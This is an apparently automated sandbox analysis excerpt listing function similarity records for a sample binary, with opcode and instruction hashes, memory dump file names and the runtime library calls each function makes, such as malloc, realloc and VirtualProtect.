                                      • Instruction ID: 6460e802e6b8c34ef31935d5bf8b64d4d12872986620687b3af51a27391a6aa6
                                      • Opcode Fuzzy Hash: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
                                      • Instruction Fuzzy Hash: 9D5192B2A09B8582EF258F16E45426D7762EB98FC4F188532CB8E47765DF3CD4968300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
                                      • Instruction ID: c6b193876db6496d5ac966326c259d3b6e59fdd1fa91e6a4a6be434771d007a4
                                      • Opcode Fuzzy Hash: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
                                      • Instruction Fuzzy Hash: 2E517FB6A09B8582EF25CF16E45426D7762EB58FC4B188432CB9E477A6DF3CD4968200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
                                      • Opcode ID: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
                                      • Instruction ID: 8a2660bdc29f7dcf45126e9bbd2d188ea737f587b196e058377ca83b3e97b29a
                                      • Opcode Fuzzy Hash: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
                                      • Instruction Fuzzy Hash: 9451A03260AB4695EA958F61E6402FC37AAFB04781F694931DF9C8B382DF3CE465C350
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$reallocstrlen
                                      • String ID:
                                      • API String ID: 2374275640-0
                                      • Opcode ID: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
                                      • Instruction ID: 73d3e2bd904e6dc423afd103a7b439ad65e05d3f4f8995e175e6e2df6c9a8a49
                                      • Opcode Fuzzy Hash: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
                                      • Instruction Fuzzy Hash: F341096260674592EF29DF26E8406AC37A5EB08B94F6C4931DF9D4B792DF3CD5A2C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: CriticalLeaveSectionfreememset
                                      • String ID:
                                      • API String ID: 1662925646-3916222277
                                      • Opcode ID: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
                                      • Instruction ID: 8c2cd7af4a45c4760ef749ce43b1de582aa66cb593c55e8b8340c4ca833c1059
                                      • Opcode Fuzzy Hash: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
                                      • Instruction Fuzzy Hash: 0F411762A0A64297EA258F25D48117C7762FB547A9F688331CA6F837D2DF3CF586C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcpy
                                      • String ID:
                                      • API String ID: 1059646398-0
                                      • Opcode ID: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
                                      • Instruction ID: 5343a336f6cd21a1b5ebdda242c4a29b97f3974af79b36e4ed3c354f0a1a1440
                                      • Opcode Fuzzy Hash: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
                                      • Instruction Fuzzy Hash: 1F41A8A2A05F8182EF298F15F5413AD7361EB58BC8F288535DB9D47396EF2CD591C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcpy
                                      • String ID:
                                      • API String ID: 1059646398-0
                                      • Opcode ID: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
                                      • Instruction ID: 5e4d17c81a9573403fe39cb970f4bd6a35d76b847ab4a1b52d263d80a5009c5b
                                      • Opcode Fuzzy Hash: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
                                      • Instruction Fuzzy Hash: 5641E7B2A06B8182DB158F16E88436D77A5EB54BC4F198531DF9D4B7A2DF3CD542C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
                                      • Instruction ID: 44e53d387a52338c5dcf49094a8edce766988aa96f31278f53c4a5b6d7d1483f
                                      • Opcode Fuzzy Hash: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
                                      • Instruction Fuzzy Hash: 13514EB6A0AB8683DF258F56E55426DB362FB68BC4B148532CB9E477A1DF3CD4518300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
                                      • Instruction ID: 3efcc6ab584237967a13eb7a32aa2e34c8a13616075f9145eabe3455762a61f1
                                      • Opcode Fuzzy Hash: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
                                      • Instruction Fuzzy Hash: F24150B2A0AB8683DF258F56E454269B362EB58BC4F548531DB9E477A2EF3CE4418300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fputclocaleconv
                                      • String ID:
                                      • API String ID: 697933784-0
                                      • Opcode ID: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
                                      • Instruction ID: e56378403f1de6bbdd2b49190ff2962b96113c19f59f799180db997a2e48c0b3
                                      • Opcode Fuzzy Hash: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
                                      • Instruction Fuzzy Hash: 92414F62E091428AF7359F66E5C137E72A2EB14754F284235DB7E82BC3DE2CE5C28750
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
                                      • Instruction ID: 959c180a8b047a771446287b4beda3baf697e82ae5a4064e3b338811b5e9efd3
                                      • Opcode Fuzzy Hash: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
                                      • Instruction Fuzzy Hash: BB3146B2A05B4583EE25DF56F9942697362EB58BC4F188431DB9E57792DF3CD441C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: enum$struct$union
                                      • API String ID: 2803490479-1076304440
                                      • Opcode ID: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
                                      • Instruction ID: b64f727b4ce0185c5bf7ca139fd631699df401071f990a21768ac7391d82cc7c
                                      • Opcode Fuzzy Hash: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
                                      • Instruction Fuzzy Hash: 1631E272A09A4184F7048F15E89867932A6EB44B91F6D4536EE4E4B7D2DE3CE583C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
                                      • Instruction ID: 6e950f0d2b33b6448847d4beb559f91641eb691e360b17f829edaca686a29445
                                      • Opcode Fuzzy Hash: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
                                      • Instruction Fuzzy Hash: 6C3175B6A05B4683DF29CF56F95427DA366EB58BC0F188432DB9E47796EF3CE4418200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$memcpyrealloc
                                      • String ID:
                                      • API String ID: 2642181057-0
                                      • Opcode ID: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
                                      • Instruction ID: b26615cf04f5b2f26c039804cf44535846dfd8ee248b961c46e7cb47b252dc1b
                                      • Opcode Fuzzy Hash: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
                                      • Instruction Fuzzy Hash: B931E572706B8185DE59DF21E9402A963A6FB09B94F6C4935CB9D8B397EF3CE581C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
                                      • Instruction ID: 17f00d7dc5b8d00dc4dc8e6ec2bad5a7ce81950dabb09637be7c78ffdccf0ffd
                                      • Opcode Fuzzy Hash: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
                                      • Instruction Fuzzy Hash: EE3146B6A05B4683DF29CF56F9542696762EB58BC0F188832CBDE47796EF3CE4418300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memcpyrealloc
                                      • String ID: %af
                                      • API String ID: 2500458235-435209106
                                      • Opcode ID: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
                                      • Instruction ID: 46e565b386c778221fbef5782e32f12d0d8d8cfaee992920a18f50de4cf90d5a
                                      • Opcode Fuzzy Hash: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
                                      • Instruction Fuzzy Hash: ED519DA2B1C6C147D73A8B34F540B9D6F62D7A2391F188225DF6903B96EE3DC6068B00
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6099B1247), ref: 00007FF6099B2589
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                      • API String ID: 544645111-395989641
                                      • Opcode ID: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
                                      • Instruction ID: 7d0ebb169b3250713ada71c5ab118ed3fd8b452be062399c052b6ed1ee7964bb
                                      • Opcode Fuzzy Hash: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
                                      • Instruction Fuzzy Hash: 97515E32E1A546C6EB109F25EA807B83772EB14B94F684131DA2D8779ADF7CE586C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: mallocrealloc
                                      • String ID: struct
                                      • API String ID: 948496778-3130185518
                                      • Opcode ID: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
                                      • Instruction ID: f8d08c5acb752a726ec0b5e654addd3a19050404227b73ea1b7701f5f01fd066
                                      • Opcode Fuzzy Hash: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
                                      • Instruction Fuzzy Hash: 9941BE72A09B9582DB25CF16E4446A83775FB58BD1F288532DF9D877A2DF38D492C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
